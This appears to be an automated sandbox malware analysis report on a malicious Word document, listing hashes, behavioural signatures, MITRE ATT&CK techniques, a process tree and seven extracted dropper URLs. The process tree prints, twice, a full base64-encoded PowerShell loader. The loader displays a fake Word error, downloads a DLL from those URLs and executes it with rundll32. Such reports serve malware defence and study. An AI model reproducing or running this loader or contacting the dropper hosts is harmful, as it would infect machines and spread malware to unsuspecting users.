6b2addd77d4961da71636553bd57f3b73bf65aebc867a3a3f0508dd58d89174e

General

Target

Bank_2020_12_9663193478.doc
Size

159KB
MD5

a62fc9507760d45349a9ce1af9700962
SHA1

263b72ee6f86c510e0b8a949acc0dd426b79b316
SHA256

6b2addd77d4961da71636553bd57f3b73bf65aebc867a3a3f0508dd58d89174e
SHA512

e03ef2398d786db29afe7f075a84f3cf28095495faf4de86011a04fcaadf61b677097d686a20fdbaa9294343f2ad69ebb27489d014c95725226436958e91d554

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://familylifetruth.com/cgi-bin/PPq7/

exe.dropper

https://coshou.com/wp-admin/EM/

exe.dropper

https://www.todoensaludips.com/wp-includes/9/

exe.dropper

https://dieuhoaxanh.vn/wp-admin/a/

exe.dropper

http://cahyaproperty.bbtbatam.com/mhD/

exe.dropper

http://depannage-vehicule-maroc.com/wp-admin/c/

exe.dropper

https://techworldo.com/cgi-bin/gcZ/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 700 3660 cmd.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

21 588 powershell.exe
23 588 powershell.exe
32 588 powershell.exe
34 588 powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	700	3660	cmd.exe

flow	pid	process
21	588	powershell.exe
23	588	powershell.exe
32	588	powershell.exe
34	588	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3372 WINWORD.EXE
3372 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

588 powershell.exe
588 powershell.exe
588 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 588 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

3372 WINWORD.EXE
3372 WINWORD.EXE
3372 WINWORD.EXE
3372 WINWORD.EXE
3372 WINWORD.EXE
3372 WINWORD.EXE
3372 WINWORD.EXE

pid	process
3372	WINWORD.EXE
3372	WINWORD.EXE

pid	process
588	powershell.exe
588	powershell.exe
588	powershell.exe

description	pid	process
Token: SeDebugPrivilege	588	powershell.exe

pid	process
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 700 wrote to memory of 68	700	cmd.exe	msg.exe
PID 700 wrote to memory of 68	700	cmd.exe	msg.exe
PID 700 wrote to memory of 588	700	cmd.exe	powershell.exe
PID 700 wrote to memory of 588	700	cmd.exe	powershell.exe
PID 588 wrote to memory of 2300	588	powershell.exe	rundll32.exe
PID 588 wrote to memory of 2300	588	powershell.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank_2020_12_9663193478.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3372

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:700
- C:\Windows\system32\msg.exe
  msg Admin /v Word experienced an error trying to open the file.
  2⤵
  PID:68
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  POwersheLL -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dll,Control_RunDLL
    3⤵
    PID:2300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dll

MD5
c4bb6db0a01f8e518a6fd0b5b7bf7f9d

SHA1
877c4c0d6ce8ff84de94accdecdcdaf977fb7f02

SHA256
d994d7a09a15f70918bd707abd21a9cdaa93d3938972ebb6c98130b40fa9add2

SHA512
0faf908ffb8eefffebd15e2d7e38833ecc2f2b136959886d3ec9f8ccdb92c5d5f6b391c54f481399c78219a4e9b0d7641e49c75c2ed00a9ab141b01d1acf583f

Download Submit
memory/68-3-0x0000000000000000-mapping.dmp

Download
memory/588-4-0x0000000000000000-mapping.dmp

Download
memory/588-5-0x00007FF88BE20000-0x00007FF88C80C000-memory.dmp

Filesize
9.9MB

Download
memory/588-6-0x000001B2FB4C0000-0x000001B2FB4C1000-memory.dmp

Filesize
4KB

Download
memory/588-7-0x000001B2FB850000-0x000001B2FB851000-memory.dmp

Filesize
4KB

Download
memory/2300-8-0x0000000000000000-mapping.dmp

Download
memory/3372-2-0x0000024336B00000-0x0000024337137000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads